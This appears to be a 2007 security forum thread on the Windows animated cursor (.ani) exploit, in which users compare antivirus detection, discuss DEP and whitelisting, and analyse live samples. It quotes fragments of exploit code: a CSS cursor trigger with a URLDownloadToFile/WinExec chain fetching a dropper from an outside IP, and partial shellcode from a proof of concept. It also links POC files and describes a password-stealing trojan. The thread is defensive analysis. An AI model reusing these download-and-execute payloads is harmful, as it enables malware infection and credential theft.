Vulnerability in Windows Animated Cursor Handling

Checked it out running 2k & IE6, NOD32 stopped it dead in it`s tracks.

 

Microsoft might have known about these vulnerabilities from back in December, but I was even more surprised to find one corrupt sample which was from 2006 (according to my source, anyway) and was actually using the ANI exploit (Or at least that is what Ewido, AntiVir, BitDefender, QuickHeal and ClamAV say). Though my particular sample was corrupt, it is still detected by certain scanners as being infected, and this creates a cause for concern as it would seem that malware using this exploit may well have been around for a while now.

As for detection of the ANI exploit, IMO the AVs with the best detection for such threats (including zero day protection) are BitDefender, NOD32 and Norman. Kaspersky is adding signatures for each variant instead of using generics, and hence ranks behind BD, NOD and Norman. I have two files using this exploit with me, I am checking them now to see who is detecting them.

EDIT: it seems most good AVs are adding this malware now.

 

I just tried it again and for a sec, I thought, that it is OK, but it is not.
At least in Vista malware can not instal anything via IE7's Protected Mode.

http://img247.imageshack.us/img247/1922/capture04022007112456um3.th.jpg

 

Mcafee viruscan enterprise 8.5.0i
DATs version 4997.0000
sorry for the large image. resize if necessary.

 

Has anyone analyzed this exploit?

It's just another means to attempt to download a trojan .

So, how do you prevent downloading of unauthorized executables?

1) One site notes that using WinXP Pro with DEP (Data Execution Prevention) enabled, blocks the exploit.

2) Anyone using SRP (Software Restriction Policies) would block.

3) Any other program with execution prevention would block.

The above are White List solutions -preferable for Zero-day prevention, since Black List solutions (AV, etc) aren't effective until the infected file is entered into the data base.

sans.org noted a couple of days ago,

From an article on White List solutions:

Analysis

This exploit is similar to the .ani file exploit from two years ago. See Microsoft Security Bulletin MS05-002

The code embedded in a web page cached a .ani file:

Code:

style

* {CURSOR: url("./exp_2/1.ani");}
 
/style

.........

GetProcAddress-LoadLibrary-GetSystemDirectory-
urlmon.dll-URLDownloadToFile-WinExec- 
HTTP: / / 195.225.177.33/vx/win32.exe

win32.exe was the dropper - easily blocked by any of the above White List solutions before the patch was released.

From some sites posted elsewhere:

ZERT's blog points out that the MS patch for the above exploit did not include another vulnerability present in the code:

I haven't seen a file in the wild, but a POC shows:

Code:

/* ANI Header */ 
unsigned char uszAniHeader[] =

......

/* Shellcode - metasploit exec calc.exe ^^ */ 
unsigned char uszShellcode[] = 
"\xeb\x03\x59\xeb\x05\xe8\xf8\

A malware author would substitute any of these for calc.exe

Conclusion

A valid threat, yes, but should not invoke "emergency mode" for those with proper protection.


regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."

--Bruce Schneier​

 

Have you tried downloading the POC from http://seclists.org/fulldisclosure/2007/Mar/0569.html using IE? Download the file and if you try this without an AV that is protecting you will be in for a nice surprise even if you have hardware DEP set to Opt Out. Be sure to NOT download the file to the desktop ...preferably to some isolated new folder or temp folder. Then try using Explorer and go to the download location. Explorer will crash and if downloaded to the desktop, Explorer will enter a crash/restart loop. You'll need to use a command window to delete the file. Or now with AV protecting you can turn on your AV but when I did this test, Avira was not yet protecting. Much of what you quoted is old, outdated, inaccurate information. Probably your best bet for current, accurate information is the GRC Security NG.

 

I tried the test from here.

http://zert.isotf.org/advisories/zert-2007-01.htm

While using IE 6 on XP Home SP2 OEM, not fully update, DEP enabled fully, the only thing that is protecting is Antivir. SSM free and GeSwall failed.

 

You have Opt IN or Opt OUT for hardware DEP status?

So, you ran the test and what? Avira popped up, I assume.

It is the seclists.org one that is nasty if you download it. Change the link to "test.ani" instead of test.html.

 

Hi Mele,

I did - I don't have an AV, nor DEP here on Win2k. nothing happened except the BOO! alert using both IE6 and Opera. I let the test.ani file cache, and then I downloaded it directly, and nothing happens.

While PoCs are useful, only the real thing lets you know what is really going on. Unfortunately, every site I've seen referenced with the exploit is either down, or has been sanitized. A friend is also searching, but she has found nothing that works.

I'm not sure what you mean. I've seen the GRC group (and your posts there). Unfortunately, there isn't really much information about how the exploit works - just running around trying to figure out how to delete the test.ani file.

Evidently this PoC needs WinXP SP2 to work, and my Laptop with XP doesn't have Deep Freeze installed, so I don't test on that machine.

My Desktop system with Win2K does have Deep Freeze so I just reboot to clear all cached and downloaded files during that session.

There is a link at GRC to a pdf file which is another confirmation of the Chinese site analysis that I referenced in my previous post:

Analysis of ANI "anih" Header Stack Overflow Vulnerability
http://www.mnin.org/write/ani-notes.pdf

My point is that ultimately, the aim of the *.ani file (or other extensions that it might use) is to download an executable, and this is what security-minded people should be concerned about. If it messes up other things on your computer, a restore, re-image, rollback, or reboot-to-restore will take care of the mess.

The previous *.ani exploit in 2005 I referenced, also downloaded an executable. Below is a screen shot showing it being blocked. Notice the *.ani file in the status bar, being cached, immediately attempting to download the executable (code listed in previous post). The current exploit will attempt something similar, as noted in my two references, one here, and one in previous post.


best regards,

-rich

 

OK, my friend found one. It's the mm.jpg file mentioned in the pdf file - I was getting ready to look for it but she beat me to it.

Notice the last line in the code (screenshot below): calling out to download an executable.

This is my point: no matter the obfuscation, sophistication of the exploit code, the money is made when a system permits a trojan/dropper to download.

The file doesn't run here - it may require XP.

I will download the executable later and scan it at VirusTotal to see what shows.


regards,

-rich

 

Went to the site to test IE for the Vulnerability but Mcafee Internet Security nabbed it first

 

I downloaded the xx.exe file and most AV identified it as a PWS (password stealing) trojan.

Note that the file embedded on the web site is a *.jpg file [mm.jpe] - identified by most AV by now as the ani.exploit. But the extension doesn't matter, since the code is an RIFF file. See:

http://www.daubnet.com/formats/ANI.html

Executing xx.exe installs bdscheca001.dll. This is a component of spyware applications:

-----------------------------------------
http://www.superantispyware.com/definition/bdscheca001/
Summary of BDSCHECA001.DLL
Spyware.PWS/Check Variant.ShellExecuteHook

Description of BDSCHECA001.DLL
File component of a password/information stealing trojan.
Observed file name may vary
-----------------------------------------

It's evidently a popular file with malware writers and was observed two months ago in the javascript code injection exploits:

"more code injection sites 8.js"
http://isc.sans.org/diary.html?storyid=2178

While the PoC demonstrates how Windows Explorer treats these types of files, the looping and all the other stuff it does is misleading IMO because the real exploit's purpose is to download the trojan. That's what you should be concerned about stopping - not detecting the .ani file, which will remain undetected on Zero-day.

Think about it: serious malware writers don't want to call attention that something is amiss. The real exploit will install a trojan surrpetitiously, also without being detected at Zero-day, unless blocked by White Listing.

So, if you understand how the exploit works, you don't have to go into "emergency mode" as the writer stated in the previous article I quoted.

The problem is -- and I've mentioned this before -- you really have to dig to get a detailed analysis of these exploits (I've found just the two I referenced). Most articles just alert to a vulnerability, and everyone panics that doomsday is upon us. It makes for good sensationalist press, but it's not the whole story, and security-minded people shouldn't take these things at face value.


regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."

--Bruce Schneier​

 

update for ANI from MS yet?

One of my computers got an autoupdate on Mon. afternoon(EST). It was about 5mb. And my other computer didn't get any updates from MS.
I am kinda wondering what that update was about.

BTW, eeye has a patch for .ani. read the article and scroll down for the patch:

http://research.eeye.com/html/alerts/zeroday/20070328.html

 

Hi Rmus, what is this software which is giving the alert on ur system( post#34)

 

I tried both with DEP enabled partialy and fully.
Antivir oped up each time.

I downloaded test.ani( 1KB file) from seclists.org and Antivir popped up. Disabled guard and then put it in a test folder. With DEP enabled, nothing happens. Will try after disabling DEP.
Surprizingly I am not ablr to download thgis file by IE 6 , I get two zero KB files, test.ani and test.ani.temp.

 

For those that follow this; bottom of the linked page has hyperlink (highlighted in green) to a .pdf with additional analysis.

Analysis of ANI 'anih' Header Stack Overflow Vulnerability

 

According to this vidoe/demo all browsers are vulnerable.However, it seems that IE7 with Protected mode is more secure than Firefox because with IE7 with Protected mode we cannot overwrite important system files , which is possible with Firefox .
It seems here IE7>Firefox .Wow

 

Anti-Executable

 

I question that. Visited the page with IE6. Was told I was vulnerable and Nod blocked it. Revisited it with FF 2.0.0.3 and was told I was not vulnerable and received no warning from Nod.

 

Thanks.

 

This is the WHOIS info for newasp.com.cn:
Apparently it is addressed to a person named Mr Chen..and some strange chinese franchise. Beijing technology company/ network information center.

WHOIS results for newasp.com.cn

Generated by www.DNSstuff.com

status = "Getting WHOIS results...";Found WHOIS server for .cn: whois.cnnic.net.cn. Looking up.

Using 6 day old cached answer (or, you can get fresh results).
Hiding E-mail address (you can get results with the E-mail address).

Domain Name: newasp.com.cn
ROID: 20060703s10011s65965947-cn
Domain Status: ok
Registrant Organization: 浙江乐清翁洋镇塘下村迎门路
Registrant Name: 陈银斌
Administrative Email: *****@hichina.com
Sponsoring Registrar: 北京万网志成科技有限公司
Name Server:dns9.hichina.com
Name Server:dns10.hichina.com
Registration Date: 2006-07-03 21:37
Expiration Date: 2007-07-03 21:37

Page source in FF for newasp.com.cn/xx/exe:
<html><head><title>Error</title></head><body>ϵͳÕÒ²»µ½Ö¸¶¨µÄÎļþ¡£
</body></html>

IP Information - 195.255.177.33
Generated by www.DNSstuff.com

IP address: 195.255.177.33
Reverse DNS: ws33.trailcon.fi.
Reverse DNS authenticity: [Verified]
ASN: 719
ASN Name: ELISA-AS (Elisa Oyj)
IP range connectivity: 4
Registrar (per ASN): RIPE
Country (per IP registrar): FI [Finland]
Country Currency: EUR [euros]
Country IP Range: 195.255.0.0 to 195.255.255.255
Country fraud profile: Normal
City (per outside source): Unknown
Country (per outside source): FI [Finland]
Private (internal) IP? No
IP address registrar: whois.ripe.net
Known Proxy? No
Link for WHOIS: 195.255.177.33